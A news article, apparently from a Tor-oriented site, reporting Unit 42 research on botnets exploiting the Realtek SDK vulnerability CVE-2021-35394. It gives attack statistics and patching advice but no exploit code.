BTC $68279.0927
ETH $3629.5433
BNB $418.8260
SOL $133.0943
XRP $0.6497
stETH $3620.7348
ADA $0.7707
DOGE $0.1827
AVAX $43.0376
DOT $9.8988
wstETH $4204.4051
TRX $0.1402
LINK $20.4333
WETH $3627.8562
MATIC $1.1461
WBTC $68015.7231
UNI $12.3628
BCH $469.5171
LTC $88.8112
IMX $3.1360
ICP $13.3800
CAKE $3.3523
ETC $35.9657
FIL $10.0244
LEO $4.8744
ATOM $12.4782
TON $2.7811
HBAR $0.1174
RNDR $7.3750
KAS $0.1614
INJ $40.6866
DAI $0.9990
OKB $56.8390
VET $0.0495
PEPE $0.0000
XLM $0.1458
FDUSD $0.9965
STX $3.0333
XMR $148.4317
WEMIX $2.7041
LDO $3.2821
NEAR $4.3354
GRT $0.3080
ARB $1.9787
THETA $2.3471
APEX $2.6824
BSV $115.5449
BTC $68279.0927
ETH $3629.5433
BNB $418.8260
SOL $133.0943
XRP $0.6497
stETH $3620.7348
ADA $0.7707
DOGE $0.1827
AVAX $43.0376
DOT $9.8988
wstETH $4204.4051
TRX $0.1402
LINK $20.4333
WETH $3627.8562
MATIC $1.1461
WBTC $68015.7231
UNI $12.3628
BCH $469.5171
LTC $88.8112
IMX $3.1360
ICP $13.3800
CAKE $3.3523
ETC $35.9657
FIL $10.0244
LEO $4.8744
ATOM $12.4782
TON $2.7811
HBAR $0.1174
RNDR $7.3750
KAS $0.1614
INJ $40.6866
DAI $0.9990
OKB $56.8390
VET $0.0495
PEPE $0.0000
XLM $0.1458
FDUSD $0.9965
STX $3.0333
XMR $148.4317
WEMIX $2.7041
LDO $3.2821
NEAR $4.3354
GRT $0.3080
ARB $1.9787
THETA $2.3471
APEX $2.6824
BSV $115.5449
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Malware exploited Realtek SDK critical bug in millions of attacks


    Between August and October last year, specialists from Palo Alto Networks observed significant activity in exploiting the CVE-2021-35394 vulnerability, exploited by several hacker groups at once. It accounts for more than 40% of the total number of incidents. The threat has a severity rating of 9.8 out of 10.

    In September 2022, a major new botnet malware called "RedGoBot" emerged to target Internet of Things (IoT) devices vulnerable to the CVE-2021-35394 threat.

    Unit 42 researchers noticed that exploitation of the vulnerability continued throughout December. As a result of these attacks, three different payloads were delivered to the victims:

    • a script that performs command-line operations on the target server to download malware;
    • an embedded command that writes a binary payload to a file and executes it;
    • an embedded command that restarts the server.

    Most of these attacks originate from botnet malware families such as Mirai, Gafgyt, Mozi and their derivatives. In April 2022, the Fodcha botnet was seen exploiting CVE-2021-35394 to carry out DDoS attacks.

    RedGoBot also exploited a DDoS vulnerability in September. The botnet can perform DDoS attacks over HTTP, ICMP, TCP, UDP, VSE, and OpenVPN protocols and supports various flooding methods.

    Specialists from Unit 42 recorded activity using CVE-2021-35394 from all over the world, but almost half of the attacks came from the United States. It is possible that the hackers used VPNs or proxy servers to hide the actual source of the attack.

    “From August 2021 to December 2022, we observed a total of 134 million hack attempts targeting CVE-2021-35394, with 97% of these attacks occurring after the start of August 2022. More than 30 countries were involved as the source of the attack, with the United States being the largest source of attacks at 48.3% of the total. Vietnam, Russia, the Netherlands, France, Luxembourg and Germany were also among the top seven countries from which, according to our observations, attackers took part in these attacks,” the Unit 42 report says.

    CVE-2021-35394 is a critical vulnerability in Realtek Jungle SDK version 2.x to 3.4.14B caused by multiple memory corruptions that allow remote unauthorized attackers to perform arbitrary command injection.

    Realtek chipsets are ubiquitous in the IoT world, and even as the Taiwanese chipmaker releases security updates to quickly fix problems in its products, supply chain complexities delay their delivery to end users.

    Realtek closed the vulnerability as early as August 15, 2021, however, often many users of IoT devices use them on a “set it and forget it” principle and do not update the software to the latest version in a timely manner.

    The spike in exploitation of CVE-2021-35394 nearly a year after Realtek released security patches indicates that hardware manufacturers and end users are at fault. It is possible that some affected devices are no longer supported by manufacturers, and they have not released an update for them at all. In some cases, an update with a fix may have been released, but users could not / did not install it.

    If your device has already been infected, it is recommended that you perform a factory reset, set a strong administrator password, and then apply any available firmware updates.

    CVE-2021-35394 is still expected to be actively exploited in the first half of 2023 due to difficulties in the chain of delivery of fixes to devices.

    Author DeepWeb
    Microdosing of psychedelics
    An exploit has been created that allows hackers to forge a certificate and take over a legitimate site

    Comments 0

    Add comment